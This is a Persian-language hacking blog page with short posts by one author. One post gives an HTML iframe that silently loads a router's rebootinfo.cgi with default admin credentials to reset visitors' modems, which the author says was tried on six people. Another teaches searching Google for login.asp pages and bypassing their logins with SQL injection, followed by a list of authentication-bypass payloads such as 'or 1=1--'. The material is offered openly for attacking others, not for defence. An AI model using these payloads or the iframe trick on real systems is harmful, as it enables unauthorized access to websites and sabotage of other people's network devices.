ﺟﺎﯾﯽ ﮐﻪ ﺩﻭﺳﺖ ﺩﺍﺷﺘﯿﻦ ﺑﺰﺍﺭﯾﺪ ﻭﻟﯽ ﺑﺎ ﺍﯾﻦ ﮐﺎﺭ ﻣﻮﺩﻡ ﻃﺮﻑ ﺭﯾﺴﺖ ﻣﯿﺸﻪ ﻧﮑﺘﻪ ﺍﯾﻨﺠﺎﺳﺖ ﮐﻪ ﻫﻤﻮﻧﻄﻮﺫ ﮐﻪ ﺩﻭﺳﺘﺎﻥ ﻣﯿﮕﻦ ﺑﺮﺍﯼ ﻭﻗﺘﯽ ﮐﺎﺭﺑﺮﺩ ﺩﺍﺭﻩ ﮐﻪ ﯾﻮﺯﺭ ﻭ ﭘﺲ admin ﺑﺎﺷﻪ ﻭﻟﯽ ﻣﺜﺎﻝ ﻋﯿﻨﯽ ﺍﺵ ﺧﻮﺩﻡ ﻫﺴﺖ ﮐﻪ ﯾﻮﺯﺭ ﻭ ﭘﺴﻢ admin ﻧﯿﺴﺖ ﻭﻟﯽ ﻣﻮﺩﻣﻢ ﺭﯾﺴﺴﺖ ﺷﺪ ﺩﻟﯿﻠﺸﻢ ﺍﯾﻦ ﺑﻮﺩ ﮐﻪ ﺩﺗﺴﺮﺳﯽ ﺑﻪ ﻓﺎﯾﻞ rebootinfo.cgi ﺁﺯﺍﺩ ﺑﻮﺩ ﮐﻪ ﻓﮏ ﮐﻨﻢ ﺩﺭ ﺗﻌﺪﺍﺩ ﺯﯾﺎﺩﯼ ﺍﺯ ﺍﻓﺮﺍﺩ ﺁﺯﺍﺩ ﻫﺴﺖ ﺑﺮﺍﯼ ﻣﺜﺎﻝ ﺍﯾﻦ ﻓﺎﯾﻞ ﺩﺭ ﺍﮐﺜﺮ ﺳﯿﺴﺘﻢ ﻫﺎﯾﯽ ﮐﻪ ﺍﺯ ﻫﻤﺎﺭﺍ ﺳﯿﺴﺘﻢ ﺩﺭ ﺗﺒﺮﯾﺰ ﻣﯿﮕﺮﻥ ﺁﺯﺍﺩ ﻫﺴﺖ ( ﺩﺭ 6 ﻧﻔﺮ ﺗﺴﺖ ﮐﺮﺩﻡ ) ﺧﺐ : ﮐﺪ :HTML > iframe src="http://admin:[email protected]/ rebootinfo.cgi" width=0 height=0

برچسب: ﺭﯾﺴﺖ ﮐﺮﺩﻥ ﻣﻮﺩﻡ ﺩﯾﮕﺮﺍﻥ ﺑﺎ ﯾﮏ ﮐﻠﯿﮏ , نویسنده: SASHA PAYDAR تاريخ: دوشنبه 2 شهريور 1394 ساعت: 8:40

ﮐﯽ ﺍﺯ ﻧﻘﻄﻪ ﺿﻌﻒ ﻫﺎﯼ Sql ﺭﺷﺘﻪ ﯼ ﺳﺎﺧﺘﺎﺭ ﺍﻥ ﻣﯿﺒﺎﺷﺪ ﮐﻪ ﻫﻤﯿﺸﻪ ﺁﺳﯿﺐ ﭘﺬﯾﺮ ﺑﻮﺩﻩ ﻭ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﻣﯿﮕﯿﺮﺩ ﺍﯾﻦ ﺁﻣﻮﺯﺵ ﺑﻪ ﺷﻤﺎ ﺭﻭﺷﻬﺎﯾﯽ ﯾﺎﺩ ﻣﯿﺪﻩ ﮐﻪ ﺑﺘﻮﺍﻧﯿﺪ ﺍﯾﻦ ﺳﺎﺧﺘﺎﺭ ﺭﺍ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﺑﺪﻫﯿﺪ . ﺣﺎﻻ ﻣﯿﺘﻮﺍﻧﯿﺪ ﺩﺭ ﮔﻮﮔﻞ ﻋﺒﺎﺭﺕ ﺯﯾﺮ ﺭﺍ ﺳﺮﭺ ﮐﻨﯿﺪ : login.asp ﺩﺭ ﺟﻮﺍﺏ ﺑﺮﺍﯼ ﺷﻤﺎ ﺗﻘﺮﯾﺒﺎ 17 ﻫﺰﺍﺭ ﻣﻮﺭﺩ ﭘﯿﺪﺍ ﻣﯿﮑﻨﺪ . ﺣﺎﻻ ﺑﻪ ﻟﯿﻨﮏ ﯾﺎﻓﺘﻪ ﻫﺎ ﺩﻗﺖ ﮐﻨﯿﺪ ﻣﺜﻼ ﭼﻨﯿﻦ ﺧﻮﺍﻫﯿﺪ ﯾﺎﻓﺖ : www.site.com/login.asp ﯾﺎ ﭼﯿﺰﻫﺎﯾﯽ ﻣﺸﺎﺑﻪ ﺍﯾﻦ . ﺍﯾﻦ ﻗﺴﻤﺘﻬﺎ ﺭﺍ ﻣﯿﺘﻮﺍﻧﯿﻢ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﺩﻫﯿﻢ . ﺣﺎﻻ ﺑﻪ ﺳﺎﺩﻩ ﺗﺮﯾﻦ ﻗﺴﻤﺖ ﺭﺳﯿﺪﯾﻢ ﮐﺎﻓﯽ ﺍﺳﺖ ﺑﺮﺍﯼ ﺭﺩ ﮐﺮﺩﻥ ﺍﯾﻦ ﻣﺎﻧﻊ ﺑﺼﻮﺭﺕ ﺯﯾﺮ ﻋﻤﻞ ﮐﻨﯿﺪ ﺑﺠﺎﯼ ﯾﻮﺯﺭ ﻧﯿﻢ Admin ﺭﺍ ﺑﺰﻧﯿﺪ ﻭ ﺑﺠﺎﯼ ﭘﺴﻮﺭﺩ ﺍﺯ ﺍﯾﻦ ﻋﺒﺎﺭﺕ ﺍﺳﺘﻔﺎﺩﻩ ﮐﻨﯿﺪ or 1=1 — ﺷﺎﯾﺪ ﺗﺎ ﺣﺎﻻ ﮐﻪ ﻣﻘﺎﻟﻪ ﺭﺍ ﺧﻮﺍﻧﺪﻩ ﺍﯾﺪ ﺗﻌﺠﺐ ﮐﺮﺩﻩ ﺍﯾﺪ ﮐﻪ ﺍﯾﻦ ﺍﻣﺮ ﭼﮕﻮﻧﻪ ﺍﻣﮑﺎﻥ ﭘﺬﯾﺮ ﺍﺳﺖ . ﺩﺭ ﺗﻤﺎﻣﯽ ﺍﯾﻦ ﻋﻤﻠﯿﺎﺕ ﺍﻃﻼﻋﺎﺕ ﻻﮔﯿﻦ ﺷﻤﺎ ﺑﺼﻮﺭﺕ Query ﻓﺮﺳﺘﺎﺩﻩ ﻣﯿﺸﻮﺩ . ﺍﮔﺮ ﺍﻃﻼﻋﺎﺕ ﺩﺭﺳﺖ ﺑﺎﺷﺪ ﺷﻤﺎ ﺍﺟﺎﺯﻩ ﯼ ﻭﺭﻭﺩ ﺧﻮﺍﻫﯿﺪ ﯾﺎﻓﺖ ﻭﮔﺮﻧﻪ ﺑﺎ ﭘﯿﻐﺎﻡ Login Failed ﻣﻮﺍﺟﻪ ﺧﻮﺍﻫﯿﺪ ﺷﺪ . ﻭﻗﺘﯽ ﺷﻤﺎ ﺍﺭﺳﺎﻟﯽ ﺭﺍ ﺑﺎ ﯾﻮﺯﺭ ﺍﺩﻣﯿﻦ ﻭ ﺑﺎ ﭘﺴﻮﺭﺩ 1234 ﺭﺍ ﺍﺭﺳﺎﻝ ﻣﯿﮑﻨﯿﺪ ﺍﺯ ﺣﺎﻟﺖ ﺍﻭﻝ ﺑﻪ ﺣﺎﻟﺖ ﺩﻭﻡ ﺗﻐﯿﯿﺮ ﭘﯿﺪﺍ ﻣﯿﮑﻨﺪ : ﺣﺎﻟﺖ ﺍﻭﻝ : " select *from table1 where login=""&log&""and password=""pwd ""& " ﺣﺎﻟﺖ ﺩﻭﻡ: " select *from table1 where login="Admin"and password="1234" " ﺣﺎﻻ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﯾﻦ ﺗﺮﮐﯿﺒﺎﺕ ﺷﻤﺎ ﻣﯿﺘﻮﺍﻧﯿﺪ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺳﺎﺧﺘﺎﺭ ﺍﺱ ﮐﯿﻮ ﺍﻝ ﺑﺮﺍﯼ ﺁﻥ ﭘﺴﻮﺭﺩ ﻫﺎﯾﯽ ﺍﺭﺳﺎﻝ ﮐﻨﯿﺪ ﮐﻪ ﺩﺭ ﺻﻮﺭﺕ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﺩﺭ ﺍﯾﻦ ﭘﺴﻮﺭﺩ ﻣﻮﺭﺩ ﻗﺒﻮﻝ ﻗﺮﺍﺭ ﮔﯿﺮﺩ ﻭ ﺩﺭ ﻭﺍﻗﻊ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﻘﻄﻪ ﺿﻌﻒ Query Strings ﺑﻪ ﺁﻥ ﺣﻤﻠﻪ ﮐﻨﺪ . ﺍﯾﻦ ﺗﺮﮐﯿﺒﺎﺕ ﮐﻪ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺳﺎﺧﺘﺎﺭ ﺍﺱ ﮐﯿﻮ ﺍﻝ ﻧﻮﺷﺘﻪ ﺷﺪﻩ ﺑﻪ ﺍﯾﻦ ﺻﻮﺭﺕ ﻣﯿﺒﺎﺷﺪ ﻧﻤﻮﻧﻪ ﻫﺎﯾﯽ ﺍﺯ ﺁﻥ ﻣﺸﺎﻫﺪﻩ ﻣﯿﮑﻨﯿﺪ : admin"-- " or 0=0 -- " or 0=0 -- or 0=0 -- " or 0=0 # " or 0=0 # or 0=0 # " or "x"="x " or "x"="x ") or ("x"="x " or 1=1-- " or 1=1-- or 1=1-- " or a=a-- " or "a"="a ") or ("a"="a ") or ("a"="a hi" or "a"="a hi" or 1=1 -- hi" or 1=1 -- hi" or "a"="a hi") or ("a"="a hi") or ("a"="a ﻫﻤﺎﻧﻄﻮﺭ ﮐﻪ ﻣﺸﺎﻫﺪﻩ ﮐﺮﺩﯾﺪ ﺍﯾﻦ ﺭﻭﺵ ﯾﮏ ﺭﻭﺵ ﺳﺎﺩﻩ ﺍﻣﺎ ﺍﺑﺘﮑﺎﺭﯼ ﻣﺒﺎﺷﺬ ﮐﻪ ﺍﺣﺘﯿﺎﺝ ﺑﻪ ﺗﻔﮑﺮ ﺩﻗﯿﻖ ﺩﺍﺭﺩ ﺍﻟﺒﺘﻪ ﺳﺎﺧﺘﺎﺭ ﻫﺎ ﻣﺘﻔﺎﻭﺕ ﻣﯿﺒﺎﺷﻨﺪ ﻭ ﺷﻤﺎ ﻣﯿﺘﻮﺍﻧﯿﺪ ﻫﻤﻪ ﯼ ﺍﯾﻦ ﺗﺮﮐﯿﺒﺎﺕ ﺑﺎﻻ ﺭﺍ ﺑﻪ ﻋﻨﻮﺍﻥ ﭘﺴﻮﺭﺩ ﺍﻣﺘﺤﺎﻥ ﮐﻨﯿﺪ ﻭ ﺣﺘﻤﺎ ﺑﻪ ﺟﻮﺍﺏ ﺧﻮﺍﻫﯿﺪ ﺭﺳﯿﺪ

برچسب: آموزش,هک,سایت,ازطریق,گوگل, نویسنده: SASHA PAYDAR تاريخ: دوشنبه 2 شهريور 1394 ساعت: 8:19

به ادمه مطلب برویدادامه مطلب

برچسب: ﭼﮕﻮﻧﻪ ﯾﮏ ﻫﮑﺮ ﺭﻣﺰ ﻋﺒﻮﺭ ﺷﻤﺎ ﺭﺍ ﻫﮏ ﻣﯽ ﮐﻨﺪ؟, نویسنده: SASHA PAYDAR تاريخ: چهارشنبه 21 مرداد 1394 ساعت: 11:11

صفحه بندی